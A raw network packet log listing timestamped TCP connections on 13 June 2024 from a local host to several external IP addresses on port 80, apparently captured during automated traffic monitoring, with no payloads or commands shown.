Jun 13, 2024 11:04:12.976507902 CEST	80	49717	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:12.976699114 CEST	49717	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:13.857759953 CEST	49717	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:14.877245903 CEST	49718	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:14.882982016 CEST	80	49718	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:14.883219957 CEST	49718	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:14.885938883 CEST	49718	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:14.891299009 CEST	80	49718	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:14.891501904 CEST	80	49718	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:15.522519112 CEST	80	49718	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:15.524360895 CEST	80	49718	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:15.524502993 CEST	49718	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:16.389070034 CEST	49718	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:17.409212112 CEST	49719	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:17.414243937 CEST	80	49719	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:17.414333105 CEST	49719	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:17.415822983 CEST	49719	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:17.420811892 CEST	80	49719	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:18.084137917 CEST	80	49719	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:18.085458994 CEST	80	49719	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:18.085637093 CEST	49719	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:18.086374044 CEST	49719	80	192.168.2.5	34.149.87.45
Jun 13, 2024 11:04:18.091216087 CEST	80	49719	34.149.87.45	192.168.2.5
Jun 13, 2024 11:04:23.468203068 CEST	49720	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:23.473222017 CEST	80	49720	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:23.473309040 CEST	49720	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:23.474843025 CEST	49720	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:23.480593920 CEST	80	49720	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:24.982574940 CEST	49720	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:25.036528111 CEST	80	49720	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:26.002357006 CEST	49721	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:26.007452965 CEST	80	49721	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:26.007627010 CEST	49721	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:26.010145903 CEST	49721	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:26.014995098 CEST	80	49721	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:27.513933897 CEST	49721	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:27.564343929 CEST	80	49721	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:28.532702923 CEST	49722	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:28.537992001 CEST	80	49722	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:28.538105011 CEST	49722	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:28.539844990 CEST	49722	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:28.544836998 CEST	80	49722	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:28.544893026 CEST	80	49722	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:30.045011997 CEST	49722	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:30.092597961 CEST	80	49722	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:31.064698935 CEST	49723	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:31.070373058 CEST	80	49723	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:31.070465088 CEST	49723	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:31.072978020 CEST	49723	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:31.081912041 CEST	80	49723	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:31.953507900 CEST	80	49720	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:31.953787088 CEST	49720	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:34.501502037 CEST	80	49721	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:34.501729965 CEST	49721	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:37.022478104 CEST	80	49722	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:37.022535086 CEST	49722	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:39.564860106 CEST	80	49723	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:39.568759918 CEST	49723	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:39.568759918 CEST	49723	80	192.168.2.5	116.213.43.190
Jun 13, 2024 11:04:39.573863029 CEST	80	49723	116.213.43.190	192.168.2.5
Jun 13, 2024 11:04:44.696957111 CEST	49724	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:44.702250004 CEST	80	49724	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:44.702332973 CEST	49724	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:44.705888033 CEST	49724	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:44.710707903 CEST	80	49724	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:45.857795954 CEST	80	49724	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:45.904402018 CEST	49724	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:46.138010979 CEST	80	49724	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:46.138206959 CEST	49724	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:46.217086077 CEST	49724	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:47.235532045 CEST	49725	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:47.240552902 CEST	80	49725	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:47.240636110 CEST	49725	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:47.243145943 CEST	49725	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:47.248042107 CEST	80	49725	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:48.371084929 CEST	80	49725	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:48.419967890 CEST	49725	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:48.729710102 CEST	80	49725	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:48.729772091 CEST	49725	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:48.756083965 CEST	49725	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:49.767992973 CEST	49726	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:49.783993006 CEST	80	49726	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:49.789634943 CEST	49726	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:49.789634943 CEST	49726	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:49.794667006 CEST	80	49726	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:49.794698954 CEST	80	49726	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:50.945491076 CEST	80	49726	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:50.987027884 CEST	49726	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:51.226919889 CEST	80	49726	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:51.226974964 CEST	49726	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:51.295026064 CEST	49726	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:52.312907934 CEST	49727	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:52.320394039 CEST	80	49727	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:52.320535898 CEST	49727	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:52.322406054 CEST	49727	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:52.329762936 CEST	80	49727	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:53.455060005 CEST	80	49727	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:53.498097897 CEST	49727	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:53.724451065 CEST	80	49727	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:53.726006031 CEST	49727	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:53.734323978 CEST	49727	80	192.168.2.5	102.222.124.13
Jun 13, 2024 11:04:53.739159107 CEST	80	49727	102.222.124.13	192.168.2.5
Jun 13, 2024 11:04:59.085349083 CEST	49728	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:04:59.090291977 CEST	80	49728	35.241.34.216	192.168.2.5
Jun 13, 2024 11:04:59.090373039 CEST	49728	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:04:59.092391968 CEST	49728	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:04:59.097259998 CEST	80	49728	35.241.34.216	192.168.2.5
Jun 13, 2024 11:04:59.864303112 CEST	80	49728	35.241.34.216	192.168.2.5
Jun 13, 2024 11:04:59.865128994 CEST	80	49728	35.241.34.216	192.168.2.5
Jun 13, 2024 11:04:59.866265059 CEST	49728	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:00.607503891 CEST	49728	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:01.627989054 CEST	49729	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:01.633176088 CEST	80	49729	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:01.636039972 CEST	49729	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:01.639981985 CEST	49729	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:01.646365881 CEST	80	49729	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:02.410602093 CEST	80	49729	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:02.411533117 CEST	80	49729	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:02.419998884 CEST	49729	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:03.138909101 CEST	49729	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:04.164103985 CEST	49730	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:04.169135094 CEST	80	49730	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:04.172127008 CEST	49730	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:04.176027060 CEST	49730	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:04.180870056 CEST	80	49730	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:04.182682037 CEST	80	49730	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:04.940085888 CEST	80	49730	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:04.941385031 CEST	80	49730	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:04.941462994 CEST	49730	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:05.685725927 CEST	49730	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:06.704893112 CEST	49731	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:06.710030079 CEST	80	49731	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:06.710107088 CEST	49731	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:06.712004900 CEST	49731	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:06.716794968 CEST	80	49731	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:07.488886118 CEST	80	49731	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:07.489033937 CEST	80	49731	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:07.489044905 CEST	80	49731	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:07.489056110 CEST	80	49731	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:07.489105940 CEST	49731	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:07.489192963 CEST	49731	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:07.491072893 CEST	80	49731	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:07.491082907 CEST	80	49731	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:07.491177082 CEST	49731	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:07.492899895 CEST	80	49731	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:07.492952108 CEST	49731	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:07.493952990 CEST	49731	80	192.168.2.5	35.241.34.216
Jun 13, 2024 11:05:07.499942064 CEST	80	49731	35.241.34.216	192.168.2.5
Jun 13, 2024 11:05:12.866591930 CEST	49732	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:12.871582985 CEST	80	49732	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:12.871644974 CEST	49732	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:12.873934031 CEST	49732	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:12.881581068 CEST	80	49732	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:13.990605116 CEST	80	49732	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:14.045022964 CEST	49732	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:14.252319098 CEST	80	49732	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:14.256100893 CEST	49732	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:14.390930891 CEST	49732	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:15.407515049 CEST	49733	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:15.412744045 CEST	80	49733	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:15.412853956 CEST	49733	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:15.414349079 CEST	49733	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:15.419637918 CEST	80	49733	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:16.409250021 CEST	80	49733	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:16.451275110 CEST	49733	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:16.602149010 CEST	80	49733	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:16.602199078 CEST	49733	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:16.920130014 CEST	49733	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:17.938155890 CEST	49734	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:17.943121910 CEST	80	49734	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:17.946698904 CEST	49734	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:17.948419094 CEST	49734	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:17.953320980 CEST	80	49734	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:17.953401089 CEST	80	49734	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:18.950418949 CEST	80	49734	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:18.998070955 CEST	49734	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:19.144161940 CEST	80	49734	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:19.144212961 CEST	49734	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:19.452493906 CEST	49734	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:20.471050978 CEST	49735	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:20.476389885 CEST	80	49735	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:20.481791019 CEST	49735	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:20.481791019 CEST	49735	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:20.486957073 CEST	80	49735	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:21.439558029 CEST	80	49735	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:21.482445002 CEST	49735	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:21.620464087 CEST	80	49735	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:21.628002882 CEST	49735	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:21.628004074 CEST	49735	80	192.168.2.5	176.113.70.180
Jun 13, 2024 11:05:21.633091927 CEST	80	49735	176.113.70.180	192.168.2.5
Jun 13, 2024 11:05:26.949548960 CEST	49736	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:26.954524994 CEST	80	49736	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:26.954611063 CEST	49736	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:26.956362009 CEST	49736	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:26.962265968 CEST	80	49736	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:27.937411070 CEST	80	49736	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:27.982450962 CEST	49736	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:28.124623060 CEST	80	49736	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:28.126163960 CEST	49736	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:28.468000889 CEST	49736	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:29.485371113 CEST	49737	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:29.490617990 CEST	80	49737	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:29.490690947 CEST	49737	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:29.492664099 CEST	49737	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:29.498717070 CEST	80	49737	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:30.467958927 CEST	80	49737	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:30.516002893 CEST	49737	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:30.657286882 CEST	80	49737	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:30.657349110 CEST	49737	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:30.998162985 CEST	49737	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:32.020009041 CEST	49738	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:32.025247097 CEST	80	49738	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:32.025352001 CEST	49738	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:32.028023958 CEST	49738	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:32.033134937 CEST	80	49738	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:32.033190012 CEST	80	49738	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:32.984710932 CEST	80	49738	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:33.029328108 CEST	49738	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:33.163249016 CEST	80	49738	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:33.163321018 CEST	49738	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:33.529397964 CEST	49738	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:34.548701048 CEST	49739	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:34.554434061 CEST	80	49739	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:34.556118011 CEST	49739	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:34.560017109 CEST	49739	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:34.567992926 CEST	80	49739	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:35.516942024 CEST	80	49739	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:35.560616016 CEST	49739	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:35.702575922 CEST	80	49739	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:35.707753897 CEST	49739	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:35.707753897 CEST	49739	80	192.168.2.5	123.58.214.101
Jun 13, 2024 11:05:35.712682962 CEST	80	49739	123.58.214.101	192.168.2.5
Jun 13, 2024 11:05:41.490731001 CEST	49740	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:41.495635986 CEST	80	49740	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:41.495708942 CEST	49740	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:41.498164892 CEST	49740	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:41.503072977 CEST	80	49740	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:42.512474060 CEST	80	49740	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:42.512722015 CEST	80	49740	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:42.514177084 CEST	49740	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:42.728266001 CEST	80	49740	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:42.728329897 CEST	49740	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:43.013752937 CEST	49740	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:44.032540083 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:44.114327908 CEST	80	49741	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:44.114474058 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:44.116477966 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:44.121506929 CEST	80	49741	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:45.623155117 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:45.935611010 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:45.992114067 CEST	80	49741	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:45.992177010 CEST	80	49741	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:45.992208004 CEST	80	49741	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:45.992232084 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:45.992239952 CEST	80	49741	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:45.992301941 CEST	80	49741	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:45.992311954 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:45.992311954 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:45.992312908 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:45.992342949 CEST	80	49741	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:45.992378950 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:45.992477894 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:46.222742081 CEST	80	49741	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:46.222789049 CEST	80	49741	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:46.223257065 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:46.223258018 CEST	49741	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:46.641808987 CEST	49742	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:46.646953106 CEST	80	49742	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:46.647118092 CEST	49742	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:46.649065018 CEST	49742	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:46.653973103 CEST	80	49742	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:46.654153109 CEST	80	49742	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:47.664129019 CEST	80	49742	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:47.664287090 CEST	80	49742	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:47.672189951 CEST	49742	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:47.881091118 CEST	80	49742	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:47.881191969 CEST	49742	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:48.154520988 CEST	49742	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:49.174355984 CEST	49743	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:49.179922104 CEST	80	49743	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:49.179996967 CEST	49743	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:49.182845116 CEST	49743	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:49.187800884 CEST	80	49743	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:50.211420059 CEST	80	49743	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:50.211565018 CEST	80	49743	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:50.211821079 CEST	49743	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:50.424185038 CEST	80	49743	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:50.428206921 CEST	49743	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:50.432081938 CEST	49743	80	192.168.2.5	103.138.88.32
Jun 13, 2024 11:05:50.437724113 CEST	80	49743	103.138.88.32	192.168.2.5
Jun 13, 2024 11:05:56.004410982 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.009712934 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.010500908 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.014115095 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.018985033 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700509071 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700550079 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700613022 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.700661898 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700699091 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700741053 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.700769901 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700807095 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700839996 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700846910 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.700875998 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700910091 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700921059 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.700947046 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.700993061 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.708893061 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.708929062 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.708962917 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.708982944 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.708998919 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.709048986 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.820580006 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.820638895 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.820671082 CEST	80	49744	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:56.820698977 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:56.820730925 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:57.513870001 CEST	49744	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:58.535976887 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:58.541127920 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:58.543363094 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:58.545034885 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:58.549953938 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.218084097 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.218141079 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.218177080 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.218189001 CEST	49745	80	192.168.2.5	162.0.213.72
Jun 13, 2024 11:05:59.218210936 CEST	80	49745	162.0.213.72	192.168.2.5
Jun 13, 2024 11:05:59.218249083 CEST	80	49745	162.0.213.72	192.168.2.5
